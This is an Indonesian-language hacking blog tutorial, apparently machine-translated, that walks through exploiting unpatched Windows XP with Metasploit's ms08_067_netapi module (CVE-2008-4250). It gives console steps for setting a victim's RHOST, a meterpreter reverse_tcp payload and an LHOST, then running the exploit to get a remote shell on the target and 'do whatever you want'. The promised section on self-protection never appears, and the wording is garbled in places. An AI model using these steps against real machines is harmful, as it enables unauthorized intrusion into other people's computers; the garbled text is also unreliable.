Metasploit Tutorial - Cara hack mesin windows XP menggunakan MS08_067_NETAPI mengeksploitasi
Dalam tutorial ini Belajar Hacking , kita akan membahas tentang sangat terkenal mengeksploitasi windows XP dan versi sebelumnya MS08_067_netapi mengeksploitasi .
Pertanyaan yang harus diselesaikan dalam posting ini :
Bagaimana untuk mendapatkan akses ke mesin unpatched Windows XP ?
Bagaimana untuk memulai ini mengeksploitasi menggunakan framework metasploit ?
Apa sebenarnya yang ?
Bagaimana untuk mengamankan diri sendiri?
Hack Windows XP dengan Metasploiot
Hack Windows XP dengan Metasploiot
Tentang Eksploitasi :
Nama asli mengeksploitasi adalah Microsoft Server Service Jalur Relatif Stack korupsi . Sebuah remote user dapat mengirim permintaan RPC khusus perajin yang memicu melimpah selama jalan canonicalization dan dapat mengeksekusi kode arbitrary pada sistem target .
CVE - ID : CVE - 2008-4250
Jadi mari kita Mulai
1 ) Menginstal versi terbaru dari Metasploit Kerangka pada windows XP atau di Backtrack .
2 ) Buka Metasploit Console .
3 ) Ketik Tampilkan Eksploitasi - Perintah ini akan mencetak nama dan deskripsi kecil semua eksploitasi dalam rangka metasploit Anda .
4 ) Kemudian mencari mengeksploitasi bernama ms08_067_netapi . Nama sebenarnya berbeda dalam versi yang berbeda dari metasploit , jadi u juga dapat menggunakan perintah pencarian untuk mencari mengeksploitasi ini.
Jenis Cari smb mengeksploitasi : ini akan mencetak semua eksploitasi SMB , mencari yang kita inginkan .
5 ) Jenis Penggunaan windows/smb/ms08_067_netapi [ USE pathoftheexploit | windows/smb/ms08_067_netapi ini adalah jalan kami mengeksploitasi ] di konsol .
6 ) Anda kemudian dapat mengetik Tampilkan opsi , ini akan mencetak semua pilihan yang tersedia untuk itu mengeksploitasi .
7 ) Sekarang Anda perlu untuk mengkonfigurasi mengeksploitasi untuk menyerang mesin target .
7.1 ) Ketik Set RHOST victimipaddress [ RHOST mengacu pada ip address dari korban , contoh: set RHOST 192.168.1.22 . Berikut 192.168.1.22 adalah alamat mesin korban . ]
Jendela 7.2 ) Ketik set payload / meterpreter / reverse_tcp .
Perintah ini akan mengikat reverse_tcp payload dengan kami mengeksploitasi . Jadi apa payload sebenarnya ?
Biar jelas permintaan Anda !
Payload : Payload adalah kode shellcode / perakitan / perintah akan dieksekusi pada mesin target setelah kami mengeksploitasi telah memperoleh akses pada mesin target .
Misalkan Anda mengeksploitasi berhasil dijalankan pada mesin target , payload Anda kemudian akan memberitahu apa yang harus dilakukan setelah itu !
payload reverse_tcp akan membuka koneksi mundur dan akan memberikan sesi metrepretter dan kemudian Anda bisa melakukan apa pun yang Anda inginkan .
Anda juga dapat memilih beberapa muatan yang berbeda dengan mengetikkan menunjukkan muatan , perintah ini akan mencetak semua muatan yang tersedia memilih dan menggunakan payload dengan menggunakan perintah payload payloadpath
7.3 ) mengatur yourownipaddress LHOST - Gunakan perintah ini untuk mengatur alamat host lokal , alamat yang mengeksploitasi akan backconnect dengan . Set alamat ip Anda sendiri di sini .
8 ) Sekarang langkah terakhir : jenis mengeksploitasi dan mengeksploitasi akan mengeksekusi dan jika mesin tidak pathched , Anda akan mendapatkan koneksi remote shell dengan mesin target dan kemudian Anda kemudian dapat melakukan apapun yang Anda inginkan .
Catatan : Anda akan mendapatkan koneksi remote dalam kasus ini di mana payload yang dipilih adalah reverse_tcp . Hasilnya akan berbeda-beda sesuai dengan payload yang dipilih .
kita akan membahas tentang perintah metrepretter di tutorial berikutnya!
Pelajari Hacking - Membuat Ethical Hacking Lebih Menarik .
Jika Anda ingin layanan keamanan untuk komputer Anda , aplikasi atau website , pastikan Anda memeriksa Belajar Hacking Security Services -Website Penetrasi Testing Service .
Inget kunjungin terus blog ane terimakasih :)